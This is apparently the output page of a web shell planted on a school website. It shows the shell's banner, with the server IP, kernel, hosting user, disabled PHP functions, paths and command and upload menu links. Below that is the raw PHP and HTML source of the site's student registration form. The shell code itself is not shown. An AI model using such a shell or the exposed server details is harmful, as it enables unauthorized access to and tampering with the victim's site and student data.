Server IP : 2a02:4780:11:1359:0:1d43:a566:2 / Your IP : 216.73.216.161 Web Server : LiteSpeed System : Linux in-mum-web1259.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u490972518 ( 490972518) PHP Version : 5.6.40 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : ON | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u490972518/domains/shivbalika.in/public_html/images/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Author: W3layouts Author URL: http://w3layouts.com License: Creative Commons Attribution 3.0 Unported License URL: http://creativecommons.org/licenses/by/3.0/ --> <!DOCTYPE html> <html> <head> <!--/tags --> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="" /> <script type="application/x-javascript"> addEventListener("load", function () { setTimeout(hideURLbar, 0); }, false); function hideURLbar() { window.scrollTo(0, 1); } </script> <script src="js/jquery-3.2.1.min.js"></script> <?php include("link/databaseconnection.php"); ?> <!--header part--> <!--work--part--> <head> <style> input { color:black; } </style> <style> #menutop { position:fixed; z-index:6666; width:100%; } #content { padding-top:135px; } #main { ; } </style> <script> $(document).ready(function(){ $("#myform").submit(function(e){ e.preventDefault(); $("#btn").prop("disabled",true); $.ajax({ url:"code/registrationcode.php?flag=1", type:"POST", data:new FormData(this), contentType:false, processData:false, success:function(res){ alert(res); if(res=="Submit") { window.location.href="student_print.php"; $("#myform").trigger("reset"); } }, error:function(){ alert("error"); } }); }); }); </script> <script> $(document).ready(function(){ $("#check").change(function(){ var c=$("#city").val(); var v=$("#village").val(); var po=$("#postoffice").val(); var d=$("#dist").val(); var s=$("#state").val(); var m=$("#mobile").val(); var pi=$("#pincode").val(); if($(this).prop("checked")==true) { $("#city1").val(c); $("#village1").val(v); $("#postoffice1").val(po); $("#dist1").val(d); $("#state1").val(s); $("#mobile1").val(m); $("#pincode1").val(pi); } else { $("#city1").val(""); $("#village1").val(""); $("#postoffice1").val(""); $("#dist1").val(""); $("#state1").val(""); $("#mobile1").val(""); $("#pincode1").val(""); } }); }); $(document).ready(function(){ $("#chek").change(function(){ if($(this).prop("checked")==true) { $("#show").css("display","none"); $("#btn").prop("disabled",false); } else { $("#show").css("display","inline-block"); $("#btn").prop("disabled",true); } }); }); $(document).ready(function(){ $("#per").focus(function(){ var o=$("#omark").val(); var t=$("#tmark").val(); var result1=o/t*100; var result=parseInt(result1); $("#per").val(result); }); }); $(document).ready(function(){ $("#select").change(function(){ var a=$("#select").val(); if(a=="high") { $("#inter1").attr("disabled","true"); $("#high1").removeAttr("disabled"); } else if(a=="inter") { $("#high1").attr("disabled","true"); $("#inter1").removeAttr("disabled"); } else if(a=="L.K.G"||a=="U.K.G"||a=="1"||a=="2"||a=="3"||a=="4"||a=="5"||a=="6"||a=="7"||a=="8") { $("#high1").attr("disabled","true"); $("#inter1").attr("disabled","true"); } else { $("#high1").removeAttr("disabled"); $("#inter1").removeAttr("disabled"); } }); }); $(document).ready(function(){ $("#select").change(function(){ var classc =$(this).val(); $.ajax({ url:"code/registrationcode.php?flag=4", type:"POST", data: {class12:classc}, success:function(res){ //alert(res); $("#sel12").html(res); }, error:function(){ alert("error"); } }); }); }); </script> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <!-- BootStrap CSS --> </script> <!--//tags --> <link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all" /> <link href="css/style.css" rel="stylesheet" type="text/css" media="all" /> <link href="css/font-awesome.css" rel="stylesheet"> <link rel="stylesheet" href="css/lightbox.css"> <!-- //for bootstrap working --> <link href="//fonts.googleapis.com/css?family=Work+Sans:200,300,400,500,600,700" rel="stylesheet"> <?php include("link/headconnection.php");?> </head> <body> <!-- header --> <?php include("link/header.php");?> <!-- //header --> <!-- gallery --> <div id="content" style="padding-top:50px"> <div id="lab" class=""> <div class="container-fluid"> <div class="row"id="picture"> <h1 class="heading-agileinfo wow animated slideInDown heading-agileinfo" data-wow-duration="1s" >Registration</h1></div> <div class="row"> <div class="panel-group"> <div class="panel panel-primary"> <div class="panel-heading"><center><h4>Registration Form</h4></center></div> <div class="panel-body"> <form class="form-horizontal" id="myform"> <!--phli row open---> <div class="col-sm-6"> <div class="form-group"> <label class="col-sm-4 control-label">Your Name<span style="color:red">*</span></label> <div class="col-sm-8"> <input type="text" class="form-control" id="name" placeholder="Student Name" name="name" style="color:black" data-validation="custom" data-validation-regexp="^([a-zA-Z\s]+)$" data-validation-error-msg="Use Only Alphabet" /> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Mother Name<span style="color:red">*</span></label> <div class="col-sm-8"> <input type="text" class="form-control" id="mother" placeholder="Mother Name" name="mother" data-validation="custom" data-validation-regexp="^([a-zA-Z\s]+)$" data-validation-error-msg="Use Only Alphabet" > </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Gender<span style="color:red">*</span></label> <div class="col-sm-8"> <input type="radio" value="male" name="gnd"> Male <input type="radio" value="female" name="gnd"> Female </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Adhar card<span style="color:red"></span></label> <div class="col-sm-8"> <input type="text" class="form-control" id="mother" placeholder=" Adhar card" name="adhar" > </div> </div> </div> <!--phli row close---> <!--dusri row open---> <div class="col-sm-6"> <div class="form-group"> <label class="col-sm-4 control-label">Father Name<span style="color:red">*</span></label> <div class="col-sm-8"> <input type="text" class="form-control" id="father" placeholder="Father Name" name="father" data-validation="custom" data-validation-regexp="^([a-zA-Z\s]+)$" data-validation-error-msg="Use Only Alphabet"> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Date Of Birth<span style="color:red">*</span></label> <div class="col-sm-8"> <input type="date" class="form-control" id="dob" placeholder="Date Of Birth" name="dob"> </div> </div> <div class="form-group"> <br/> <label class="col-sm-4 control-label">Session <span style="color:red">*</span></label> <div class="col-sm-8"> <select class="form-control" name="session"> <?php $selc="select * from session order by id desc"; $resc=mysqli_query($conn,$selc); ?> <option >--Select--</option> <?php while($rowc=mysqli_fetch_array($resc,MYSQLI_BOTH)) { ?> <option ><?php echo $rowc['session'];?></option> <?php } ?> </select> </div> </div> <!--dusri row close---> </div> <div class="form-group"> <label class="col-sm-4 control-label"> <span style="color:red"></span></label> <div class="col-sm-6"> </div> </div> <hr/> <!-- one div-subject open---> <!-- one div-subject close---> <!-- second div-subject open---> <div class="col-sm-4"> <div class="form-group"> <label class="col-sm-4 control-label">Board <span style="color:red">*</span></label> <div class="col-sm-6"> <select class="form-control" name="mediam"> <option>---select---</option> <option>UP BOARD</option> <option>CBSE BOARD</option> </select> </div> </div> <hr/> </div> <div class="col-sm-4"> <div class="form-group"> <label class="col-sm-6 control-label">Choose Group<span style="color:red">*</span></label> <div class="col-sm-6"> <?php $selc="select * from class"; $resc=mysqli_query($conn,$selc); ?> <select class="form-control" style="font-weight:bold" id="select" name="class"> <option >--Select--</option> <?php while($rowc=mysqli_fetch_array($resc,MYSQLI_BOTH)) { ?> <option value="<?php echo $rowc['1'];?>"><?php echo $rowc['1'];?></option> <?php } ?> </select> </div> </div> <hr/> </div> <div class="col-sm-4"> <div class="form-group"> <label class="col-sm-4 control-label">Class <span style="color:red">*</span></label> <div class="col-sm-6"> <select class="form-control" id="sel12" name="group"> <option>---select---</option> <option></option> </select> </div> </div> <hr/> </div> <div class="row"> <hr/> <center> <h4 style="color:black">Eligibility</h4></center> <div class="table table-responsive"> <table class="table" border="1px"> <tr class="text-center"> <th>Previous Eligibility<span style="color:red">*</span></th><th>Board/Uni/Inst.<span style="color:red">*</span></th><th>Year<span style="color:red">*</span></th><th>Total Marks<span style="color:red">*</span></th><th>Obtain Marks<span style="color:red">*</span></th><th>Per</th><th>Grade</th> </tr> <tr> <td><input type="text" class="form-control" name="ele" /></td><td><input type="text" class="form-control" name="board" required="required" maxlength="34"/></td><td><input type="number" class="form-control" name="year"/></td><td><input type="number" class="form-control"name="tmark" id="tmark"/></td><td><input type="number" class="form-control" name="omark" id="omark"/></td><td><input type="number" class="form-control" name="per" id="per"/></td><td><input type="text"class="form-control" name="grade"></td> </tr> </table> </div> <hr/> </div> <!-- second div-subject close---> <input type="hidden" value="<?php echo substr(time().rand(1000,9000),7);?>" name="app"> <div class="col-sm-6"> <h4 class="text-center" style="color:black">Corresponding Address</h4> <hr/> <div class="form-group"> <label class="col-sm-4 control-label">City<span style="color:red"></span></label> <div class="col-sm-8"> <input type="text" class="form-control" id="city" placeholder="city" name="city"> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Village<span style="color:red">*</span></label> <div class="col-sm-8"> <input type="text" class="form-control" id="village" placeholder="Village" name="village" data-validation="custom" data-validation-regexp="^([a-zA-Z\s]+)$" data-validation-error-msg="Use Only Alphabet"> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Post Office<span style="color:red"></span></label> <div class="col-sm-8"> <input type="text" class="form-control" id="postoffice" placeholder="Post Office" name="postoffice"> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Dist<span style="color:red">*</span></label> <div class="col-sm-8"> <input type="text" class="form-control" id="dist" placeholder="Dist" name="dist" data-validation="custom" data-validation-regexp="^([a-zA-Z\s]+)$" data-validation-error-msg="Use Only Alphabet"> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">State<span style="color:red">*</span></label> <div class="col-sm-8"> <input type="text" class="form-control" id="state" placeholder="State" name="state" > </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Mobile<span style="color:red" >*</span></label> <div class="col-sm-8"> <input type="text" class="form-control" id="mobile" data-validation="number"required="required" maxlength="16" name="mobile" data-validation-error-msg="Only Use Number" /> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Area Code</label> <div class="col-sm-8"> <input type="text" class="form-control" id="pincode" placeholder="Area Code" name="pincode" data-validation="number"required="required" data-validation-error-msg="Only Use Number" required> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Picture<span style="color:red">*</span></label> <div class="col-sm-8"> <input type="file" class="form-control" id="pic" name="picture"> </div> </div> </div> <div class="col-sm-6"> <h4 class="text-center" style="color:black">Personally Address</h4> <hr/> <div class="form-group"> <label class="col-sm-4 control-label"><span><input type="checkbox" id="check"> Same address </span>City</label> <div class="col-sm-8"> <input type="text" class="form-control" id="city1" placeholder="city" name="city1"> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Village</label> <div class="col-sm-8"> <input type="text" class="form-control" id="village1" placeholder="Village" name="village1"> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Post Office</label> <div class="col-sm-8"> <input type="text" class="form-control" id="postoffice1" placeholder="Post Office" name="postoffice1"> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Dist</label> <div class="col-sm-8"> <input type="text" class="form-control" id="dist1" placeholder="Dist" name="dist1"> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">State</label> <div class="col-sm-8"> <input type="text" class="form-control" id="state1" placeholder="State" name="state1"> </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Mobile</label> <div class="col-sm-8"> <input type="number" class="form-control" id="mobile1" placeholder="mobile" name="mobile1" > </div> </div> <div class="form-group"> <label class="col-sm-4 control-label">Area Code</label> <div class="col-sm-8"> <input type="number" class="form-control" id="pincode1" placeholder="Area Code" name="pincode1"> </div> </div> </div><br/><br/> <span style="margin-left:100px;font-size:17px"><input type="checkbox" id="chek"/> I have read and agree to the <a href="#">terms and conditions.</a></span><br/> <center> <span id="show" style="color:red">Please Check Box</span> <button class="btn btn-success" id="btn" disabled id="sub" >Submit</button>   <button class="btn btn-success" value="reset">Reset</button> </form> </center> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/jquery-form-validator/2.3.26/jquery.form-validator.min.js"></script> <script> $.validate({ lang: 'es', modules : 'html5' }); </script> </div> <script src="js/lightbox-plus-jquery.min.js"> </script> </div> </div> <!-- //gallery --> <!-- footer --> <?php include("link/footer.php");?> <!-- //footer --> <!-- modal --> <div class="modal about-modal fade" id="myModal" tabindex="-1" role="dialog"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> <h4 class="modal-title">Instruction</h4> </div> <div class="modal-body"> <div class="agileits-w3layouts-info"> <img src="images/g12.jpg" class="img-responsive" alt="" /> <p>Duis venenatis, turpis eu bibendum porttitor, sapien quam ultricies tellus, ac rhoncus risus odio eget nunc. Pellentesque ac fermentum diam. Integer eu facilisis nunc, a iaculis felis. Pellentesque pellentesque tempor enim, in dapibus turpis porttitor quis. Suspendisse ultrices hendrerit massa. Nam id metus id tellus ultrices ullamcorper. Cras tempor massa luctus, varius lacus sit amet, blandit lorem. Duis auctor in tortor sed tristique. Proin sed finibus sem</p> </div> </div> </div> </div> </div> <!-- //modal --> <a href="#home" class="scroll" id="toTop" style="display: block;"> <span id="toTopHover" style="opacity: 1;"> </span></a> <!-- js --> <script type="text/javascript" src="js/jquery-2.1.4.min.js"></script> <script type="text/javascript" src="js/bootstrap.js"></script> </div> </div> </div> </div> </body> </html>